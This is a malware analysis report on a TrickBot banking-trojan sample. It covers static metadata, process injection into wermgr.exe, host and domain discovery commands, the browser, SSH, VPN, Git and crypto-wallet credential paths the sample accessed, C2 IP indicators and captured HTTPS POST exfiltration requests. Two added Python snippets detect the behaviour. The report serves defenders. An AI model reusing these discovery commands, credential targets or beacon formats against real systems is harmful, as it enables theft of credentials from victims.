Malware Analysis: TrickBot
Disclaimer
The following is a Malware analysis report for the binary with SHA-256 hash 91beb7c43da3dd723c9d44629ab656b4f913c5ec111d1d362279938645f7edd3.
The binary can be downloaded from MalwareBazaar.
I take no responsibility for any actions you take based on this report.
Use caution when downloading and executing malware.
Use a virtual machine, be safe, have fun.
Opinions
TrickBot's main goal, being a banking trojan at heart, is to steal credit card and bank account information.
However, that has not been lucrative enough for the bad actors, so more and more kinds of data are being searched for and the use of stage two payloads has increased.
This sample was only running for 15-20 minutes. Typically in TrickBot infections the malware will continue to beacon out indefinitely.
It is not uncommon to see a stage two payload pushed to beaconing victims days after the initial infection.
The stage two payload is typically more persistent and is usually either a ransomware variant or a crypto miner.
TrickBot, like other popular trojans, will continue to evolve.
Anti-analysis techniques will be added. Capabilities will be added.
Whether it's stealing financial or personal data or delivering ransomware, as long as there is a way to profit from it, it will continue to be used.
Analysis Summary
When executed, this malware spawns another instance of itself.
This new process then runs and injects malicious code into the legitimate Windows process wermgr.exe.
wermgr.exe then launches svchost.exe to run the host discovery commands.
The discovery seen in this sample involves running ipconfig.exe, net.exe and nltest.exe, as well as a GET request to wtfismyip[.]com, which returns the public IP of the host.
Aside from data about the host and network, the malware also searched the host itself for sensitive information.
Cryptocurrency credentials, SSH credentials, VPN credentials and configurations, VNC credentials and configurations, Git credentials, and browser history, cache and saved passwords were all searched for.
The malware then exfiltrates this data over HTTPS in POST requests to several of its C2 servers.
One of the POST requests indicates that credit card information may also have been searched for in files on the host.
As for persistence, nothing of note was done: no registry keys, scheduled tasks, or services were created.
Environment and tools
Static Analysis
Data | Value |
---|---|
File Size | 540724 bytes |
Code Signing | Unsigned |
MD5 | 5930091b65aed9627dd1a4e86458b72f |
SHA1 | 1e6ee2e805e21c007aa70217856bf31141ccc552 |
SHA256 | 91beb7c43da3dd723c9d44629ab656b4f913c5ec111d1d362279938645f7edd3 |
SSDEEP | 6144:QXRZwJkHAfrJoz9KnjY/F0eAcLeRpJ0ulEypWu/blRTZSMIbBkfoqpArjO:QXRZmrJoBKIqkapJDmy4uBRTQ4pD |
IMPHash | a9daf8a064784a80002aa6baaea5ce3b |
Compile Time | Wed Jul 22 08:55:12 2020 |
Packed | No |
Compiler | Microsoft Visual Basic 6.0 |
Linker | Microsoft Linker |
Overlay | PDB 2.0 file link |
Entropy | 6.827 |
PE Sections
PE Section | MD5 | Entropy | Size | Entry Point | Access |
---|---|---|---|---|---|
.text | 9F4717E23F056519B2BEEB92221702EB | 5.838 | 339968 bytes | 0x0000487C | R,X |
.data | 620F0B67A91F7F74151BC5BE745B7110 | 0 | 4096 bytes | | R,W,ID |
.rsrc | 34DEF4049197F06B4075C6A749B19987 | 7.895 | 192512 bytes | | R,ID |
Imports
Library | Count |
---|---|
oleaut32.dll | 1 |
kernel32.dll | 1 |
MSVBVM60.DLL | 144 |
Possible Breakpoints
- VirtualAlloc
Capabilities
Capability | Namespace |
---|---|
execute anti-VM instructions (2 matches) | anti-analysis/anti-vm/vm-detection |
contains PDB path | executable/pe/pdb |
contain a resource (.rsrc) section | executable/pe/section/rsrc |
parse PE header (4 matches) | load-code/pe |
Tactics and Techniques
ATT&CK Tactic | ATT&CK Technique |
---|---|
DEFENSE EVASION | Virtualization/Sandbox Evasion::System Checks [T1497.001] |
EXECUTION | Shared Modules [T1129] |
OSINT
Behavioral Analysis
Processes
Process | PID | Command Line |
---|---|---|
91beb7c43da3dd….exe | 5388 | 91beb7c43da3dd….exe |
91beb7c43da3dd….exe | 3128 | 91beb7c43da3dd….exe |
wermgr.exe | 2904 | wermgr.exe |
svchost.exe | 5204 | svchost.exe |
svchost.exe | 6944 | svchost.exe |
ipconfig.exe | 6016 | ipconfig /all |
net.exe | 6240 | net config workstation |
net.exe | 6404 | net view /all |
net.exe | 264 | net view /all /domain |
nltest.exe | 6556 | nltest /domain_trusts |
nltest.exe | 3808 | nltest /domain_trusts /all_trusts |
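As an added example (not from the original report), a Python hunt over constructed process-creation events modelled on the table above: it flags wermgr.exe instances that have several discovery commands descended from them, since Windows Error Reporting has no reason to launch ipconfig, net or nltest. The page gives PIDs but not parent PIDs, so the parent links below are assumed.

```python
# Constructed process-creation events modelled on the page's process table.
# Parent PIDs are assumed; the page lists PIDs but not parent PIDs.
EVENTS = [
    {"pid": 5388, "ppid": 1000, "image": "91beb7c43da3dd.exe", "cmdline": "91beb7c43da3dd.exe"},
    {"pid": 3128, "ppid": 5388, "image": "91beb7c43da3dd.exe", "cmdline": "91beb7c43da3dd.exe"},
    {"pid": 2904, "ppid": 3128, "image": "wermgr.exe", "cmdline": "wermgr.exe"},
    {"pid": 5204, "ppid": 2904, "image": "svchost.exe", "cmdline": "svchost.exe"},
    {"pid": 6944, "ppid": 2904, "image": "svchost.exe", "cmdline": "svchost.exe"},
    {"pid": 6016, "ppid": 5204, "image": "ipconfig.exe", "cmdline": "ipconfig /all"},
    {"pid": 6240, "ppid": 5204, "image": "net.exe", "cmdline": "net config workstation"},
    {"pid": 6404, "ppid": 6944, "image": "net.exe", "cmdline": "net view /all"},
    {"pid": 264, "ppid": 6944, "image": "net.exe", "cmdline": "net view /all /domain"},
    {"pid": 6556, "ppid": 6944, "image": "nltest.exe", "cmdline": "nltest /domain_trusts"},
    {"pid": 3808, "ppid": 6944, "image": "nltest.exe", "cmdline": "nltest /domain_trusts /all_trusts"},
    # Benign noise: a service-hosted svchost, and an admin running ipconfig from a shell.
    {"pid": 700, "ppid": 600, "image": "svchost.exe", "cmdline": "svchost.exe -k netsvcs"},
    {"pid": 800, "ppid": 4000, "image": "ipconfig.exe", "cmdline": "ipconfig /all"},
]
DISCOVERY = {"ipconfig.exe", "net.exe", "nltest.exe"}


def ancestors(pid, by_pid):
    """Yield (pid, image) up the parent chain; stops at unknown parents or cycles."""
    seen = set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        yield pid, by_pid[pid]["image"].lower()
        pid = by_pid[pid]["ppid"]


def find_wermgr_discovery(events, threshold=3):
    """Map each wermgr.exe PID to the discovery command lines run beneath it,
    keeping only instances with at least `threshold` distinct commands."""
    by_pid = {e["pid"]: e for e in events}
    hits = {}
    for e in events:
        if e["image"].lower() not in DISCOVERY:
            continue
        for pid, image in ancestors(e["ppid"], by_pid):
            if image == "wermgr.exe":
                hits.setdefault(pid, []).append(e["cmdline"])
                break
    return {pid: cmds for pid, cmds in hits.items() if len(set(cmds)) >= threshold}
```

The threshold keeps a single stray command from alerting; the two benign events never reach a wermgr.exe ancestor and are ignored.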
Files Created
C:\Users\REM\AppData\Local\Temp\~DF5E8D1E64DE577706.TMP
Files Accessed
C:\Program Files\UltraVNC\ultravnc.ini
C:\Program Files\uvnc bvba\UltraVNC\ultravnc.ini
C:\Program Files (x86)\UltraVNC\ultravnc.ini
C:\Program Files (x86)\uvnc bvba\UltraVNC\ultravnc.ini
C:\Users\REM\AppData\Local\Google\Chrome\User Data\Default\History
C:\Users\REM\AppData\Local\Google\Chrome\User Data\Default\History.bak
C:\Users\REM\AppData\Local\Google\Chrome\User Data\Default\Login Data
C:\Users\REM\AppData\Local\Google\Chrome\User Data\Default\Login Data.bak
C:\Users\REM\AppData\Local\Google\Chrome\User Data\Default\Web Data
C:\Users\REM\AppData\Local\Google\Chrome\User Data\Default\Web Data.bak
C:\Users\REM\AppData\Local\Google\Chrome\User Data\Local State
C:\Users\REM\AppData\Local\Google\Chrome\User Data\Local State.bak
C:\Users\REM\.config\git\credentials
C:\Users\REM\.git-credentials
Directories Listed
C:\Users\REM\AppData\Roaming\bitcoin
C:\Users\REM\AppData\Roaming\litecoin
C:\Users\REM\.ssh
C:\Users\REM\AppData\Local\Microsoft\Windows\INetCookies
C:\Users\REM\AppData\Local\Microsoft\Windows\INetCache
C:\Users\REM\AppData\Local\Microsoft\Windows\INetCache\Content.IE5
C:\Users\REM\AppData\Local\Microsoft\Windows\INetCache\IE
PCAP
Protocols
Protocol | Number of Packets |
---|---|
TCP | 1218 |
SSL | 623 |
HTTP | 10 |
Indicators of Compromise
- 103.12.161.194
- 103.111.83.246
- 82.146.46.209
- 194.5.249.157
- 96.9.73.73
- 203.176.135.102
Exfiltration
```http
POST /tot773/DESKTOP-2C3IQHO_W10016299.4059EF9DC2CA46AD60D2E0765459BD36/81/ HTTP/1.1
Accept: */*
Content-Type: multipart/form-data; boundary=---------KNFVSHSAHHJUPYKX
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; Tablet PC 2.0; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: 194.5.249.157:443
Content-Length: 219
Connection: Close
Cache-Control: no-cache

-----------KNFVSHSAHHJUPYKX
Content-Disposition: form-data; name="data"

-----------KNFVSHSAHHJUPYKX
Content-Disposition: form-data; name="source"

OpenVPN passwords and configs
-----------KNFVSHSAHHJUPYKX--
```

```http
POST /tot773/DESKTOP-2C3IQHO_W10016299.4059EF9DC2CA46AD60D2E0765459BD36/83/ HTTP/1.1
Accept: */*
Content-Type: multipart/form-data; boundary=---------OCPLLBXQPEACMBMT
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; Tablet PC 2.0; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: 194.5.249.157:443
Content-Length: 473
Connection: Close
Cache-Control: no-cache

-----------OCPLLBXQPEACMBMT
Content-Disposition: form-data; name="formdata"

{"descr":["NordVPN"],"dns1":["103.86.99.100"],"email":["USERNAME"],"q":["microsoft office"],"search":["91beb7c43da3dd723c9d44629ab656b4f913c5ec111d1d362279938645f7edd3"],"usernamefld":["admin"]}
-----------OCPLLBXQPEACMBMT
Content-Disposition: form-data; name="billinfo"

{]}
-----------OCPLLBXQPEACMBMT
Content-Disposition: form-data; name="cardinfo"

{]}
-----------OCPLLBXQPEACMBMT--
```

```http
POST /tot773/DESKTOP-2C3IQHO_W10016299.4059EF9DC2CA46AD60D2E0765459BD36/81/ HTTP/1.1
Accept: */*
Content-Type: multipart/form-data; boundary=---------IMJCMDOMDOMKUGNM
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; Tablet PC 2.0; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: 96.9.73.73
Content-Length: 219
Connection: Close
Cache-Control: no-cache

-----------IMJCMDOMDOMKUGNM
Content-Disposition: form-data; name="data"

-----------IMJCMDOMDOMKUGNM
Content-Disposition: form-data; name="source"

OpenVPN passwords and configs
-----------IMJCMDOMDOMKUGNM--
```

```http
POST /tot773/DESKTOP-2C3IQHO_W10016299.4059EF9DC2CA46AD60D2E0765459BD36/81/ HTTP/1.1
Accept: */*
Content-Type: multipart/form-data; boundary=---------OTTNHTNLBMUSVCXD
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; Tablet PC 2.0; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: 194.5.249.157:443
Content-Length: 210
Connection: Close
Cache-Control: no-cache

-----------OTTNHTNLBMUSVCXD
Content-Disposition: form-data; name="data"

-----------OTTNHTNLBMUSVCXD
Content-Disposition: form-data; name="source"

OpenSSH private keys
-----------OTTNHTNLBMUSVCXD--
```

```http
POST /tot773/DESKTOP-2C3IQHO_W10016299.4059EF9DC2CA46AD60D2E0765459BD36/83/ HTTP/1.1
Accept: */*
Content-Type: multipart/form-data; boundary=---------QAKGETNFFXRQJOMX
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; Tablet PC 2.0; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: 96.9.73.73
Content-Length: 473
Connection: Close
Cache-Control: no-cache

-----------QAKGETNFFXRQJOMX
Content-Disposition: form-data; name="formdata"

{"descr":["NordVPN"],"dns1":["103.86.99.100"],"email":["USERNAME"],"q":["microsoft office"],"search":["91beb7c43da3dd723c9d44629ab656b4f913c5ec111d1d362279938645f7edd3"],"usernamefld":["admin"]}
-----------QAKGETNFFXRQJOMX
Content-Disposition: form-data; name="billinfo"

{]}
-----------QAKGETNFFXRQJOMX
Content-Disposition: form-data; name="cardinfo"

{]}
-----------QAKGETNFFXRQJOMX--
```

```http
POST /tot773/DESKTOP-2C3IQHO_W10016299.4059EF9DC2CA46AD60D2E0765459BD36/81/ HTTP/1.1
Accept: */*
Content-Type: multipart/form-data; boundary=---------BSBWMEZDSAFVUJLA
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; Tablet PC 2.0; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: 96.9.73.73
Content-Length: 210
Connection: Close
Cache-Control: no-cache

-----------BSBWMEZDSAFVUJLA
Content-Disposition: form-data; name="data"

-----------BSBWMEZDSAFVUJLA
Content-Disposition: form-data; name="source"

OpenSSH private keys
-----------BSBWMEZDSAFVUJLA--
```
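Added example, not part of the original report: a Python parser for the POST beacons above that splits the URL path into its first component (labelled gtag here), the victim hostname and OS build, the 32-hex client id and the numeric command code, then pulls the multipart form fields out of the body. The sample request is reconstructed from the first capture with the User-Agent header omitted, and the path regex only reflects the shape observed in this sample.

```python
import re

# Request reconstructed from the page's first captured POST (User-Agent omitted);
# CRLF line endings as they appear on the wire, boundary taken from that capture.
BOUNDARY = "---------KNFVSHSAHHJUPYKX"
SAMPLE_POST = (
    "POST /tot773/DESKTOP-2C3IQHO_W10016299.4059EF9DC2CA46AD60D2E0765459BD36/81/ HTTP/1.1\r\n"
    "Accept: */*\r\n"
    f"Content-Type: multipart/form-data; boundary={BOUNDARY}\r\n"
    "Host: 194.5.249.157:443\r\n"
    "Content-Length: 219\r\n"
    "Connection: Close\r\n"
    "\r\n"
    f"--{BOUNDARY}\r\n"
    'Content-Disposition: form-data; name="data"\r\n'
    "\r\n"
    "\r\n"
    f"--{BOUNDARY}\r\n"
    'Content-Disposition: form-data; name="source"\r\n'
    "\r\n"
    "OpenVPN passwords and configs\r\n"
    f"--{BOUNDARY}--\r\n"
)

# Path shape seen in every request above: /<gtag>/<hostname>_<osver>.<32-hex client id>/<command>/
PATH_RE = re.compile(
    r"^/(?P<gtag>[A-Za-z0-9]+)/(?P<host>[^/_]+)_(?P<osver>W\d+)\.(?P<cid>[0-9A-F]{32})/(?P<cmd>\d+)/$"
)


def parse_beacon(raw):
    """Return the beacon's path fields and multipart form fields, or None if the
    request does not have the path shape observed in this sample."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, path, _ = lines[0].split(" ", 2)
    headers = {k.lower(): v for k, v in (l.split(": ", 1) for l in lines[1:] if ": " in l)}
    m = PATH_RE.match(path)
    if method != "POST" or m is None:
        return None
    delimiter = "--" + headers.get("content-type", "").split("boundary=", 1)[-1]
    fields = {}
    for part in body.split(delimiter)[1:]:
        if part.startswith("--"):  # closing delimiter, no more parts
            break
        part_head, _, value = part.lstrip("\r\n").partition("\r\n\r\n")
        name = re.search(r'name="([^"]*)"', part_head)
        if name:
            fields[name.group(1)] = value[:-2] if value.endswith("\r\n") else value
    return {"gtag": m["gtag"], "host": m["host"], "client_id": m["cid"],
            "command": int(m["cmd"]), "c2": headers.get("host"), "fields": fields}
```

An empty "data" field with a populated "source" field, as in the sample, records what the module looked for even when the host had nothing to steal, which is useful context when triaging a capture.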